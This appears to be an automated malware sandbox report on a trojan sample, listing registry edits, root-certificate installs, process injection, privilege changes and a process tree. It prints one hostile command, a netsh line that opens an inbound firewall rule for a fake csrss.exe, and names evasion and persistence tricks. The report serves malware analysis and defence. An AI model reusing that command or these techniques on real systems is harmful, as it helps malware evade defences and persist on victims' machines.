Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2572	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1160	csrss.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1160	csrss.exe
1220	injector.exe
1160	csrss.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe
1220	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2572	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Token: SeImpersonatePrivilege	2572	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
Token: SeSystemEnvironmentPrivilege	1160	csrss.exe
Token: SeSecurityPrivilege	2836	sc.exe
Token: SeSecurityPrivilege	2836	sc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2868 wrote to memory of 2612	2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe	33
PID 2868 wrote to memory of 2612	2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe	33
PID 2868 wrote to memory of 2612	2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe	33
PID 2868 wrote to memory of 2612	2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe	33
PID 2612 wrote to memory of 2672	2612	cmd.exe	35
PID 2612 wrote to memory of 2672	2612	cmd.exe	35
PID 2612 wrote to memory of 2672	2612	cmd.exe	35
PID 2868 wrote to memory of 1160	2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe	36
PID 2868 wrote to memory of 1160	2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe	36
PID 2868 wrote to memory of 1160	2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe	36
PID 2868 wrote to memory of 1160	2868	6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe	36
PID 1160 wrote to memory of 1220	1160	csrss.exe	44
PID 1160 wrote to memory of 1220	1160	csrss.exe	44
PID 1160 wrote to memory of 1220	1160	csrss.exe	44
PID 1160 wrote to memory of 1220	1160	csrss.exe	44
PID 1452 wrote to memory of 748	1452	patch.exe	47
PID 1452 wrote to memory of 748	1452	patch.exe	47
PID 1452 wrote to memory of 748	1452	patch.exe	47
PID 1452 wrote to memory of 876	1452	patch.exe	49
PID 1452 wrote to memory of 876	1452	patch.exe	49
PID 1452 wrote to memory of 876	1452	patch.exe	49
PID 1452 wrote to memory of 564	1452	patch.exe	51
PID 1452 wrote to memory of 564	1452	patch.exe	51
PID 1452 wrote to memory of 564	1452	patch.exe	51
PID 1452 wrote to memory of 2176	1452	patch.exe	53
PID 1452 wrote to memory of 2176	1452	patch.exe	53
PID 1452 wrote to memory of 2176	1452	patch.exe	53
PID 1452 wrote to memory of 2308	1452	patch.exe	55
PID 1452 wrote to memory of 2308	1452	patch.exe	55
PID 1452 wrote to memory of 2308	1452	patch.exe	55
PID 1452 wrote to memory of 368	1452	patch.exe	57
PID 1452 wrote to memory of 368	1452	patch.exe	57
PID 1452 wrote to memory of 368	1452	patch.exe	57
PID 1452 wrote to memory of 1808	1452	patch.exe	59
PID 1452 wrote to memory of 1808	1452	patch.exe	59
PID 1452 wrote to memory of 1808	1452	patch.exe	59
PID 1452 wrote to memory of 2312	1452	patch.exe	61
PID 1452 wrote to memory of 2312	1452	patch.exe	61
PID 1452 wrote to memory of 2312	1452	patch.exe	61
PID 1452 wrote to memory of 2400	1452	patch.exe	63
PID 1452 wrote to memory of 2400	1452	patch.exe	63
PID 1452 wrote to memory of 2400	1452	patch.exe	63
PID 1452 wrote to memory of 1752	1452	patch.exe	65
PID 1452 wrote to memory of 1752	1452	patch.exe	65
PID 1452 wrote to memory of 1752	1452	patch.exe	65
PID 1452 wrote to memory of 1624	1452	patch.exe	67
PID 1452 wrote to memory of 1624	1452	patch.exe	67
PID 1452 wrote to memory of 1624	1452	patch.exe	67
PID 1452 wrote to memory of 2232	1452	patch.exe	69
PID 1452 wrote to memory of 2232	1452	patch.exe	69
PID 1452 wrote to memory of 2232	1452	patch.exe	69
PID 1452 wrote to memory of 1584	1452	patch.exe	71
PID 1452 wrote to memory of 1584	1452	patch.exe	71
PID 1452 wrote to memory of 1584	1452	patch.exe	71
PID 1160 wrote to memory of 2228	1160	csrss.exe	73
PID 1160 wrote to memory of 2228	1160	csrss.exe	73
PID 1160 wrote to memory of 2228	1160	csrss.exe	73
PID 1160 wrote to memory of 2228	1160	csrss.exe	73
PID 1160 wrote to memory of 552	1160	csrss.exe	75
PID 1160 wrote to memory of 552	1160	csrss.exe	75
PID 1160 wrote to memory of 552	1160	csrss.exe	75
PID 1160 wrote to memory of 552	1160	csrss.exe	75
PID 2908 wrote to memory of 2164	2908	windefender.exe	84
PID 2908 wrote to memory of 2164	2908	windefender.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
"C:\Users\Admin\AppData\Local\Temp\6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
- C:\Users\Admin\AppData\Local\Temp\6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe
  "C:\Users\Admin\AppData\Local\Temp\6dcf05e23735148c65ce53ab6b3aa8c36da260ceacbc22eb2e56e32cdb13c68b.exe"
  2⤵
  - Windows security bypass
  - Loads dropped DLL
  - Windows security modification
  - Adds Run key to start application
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
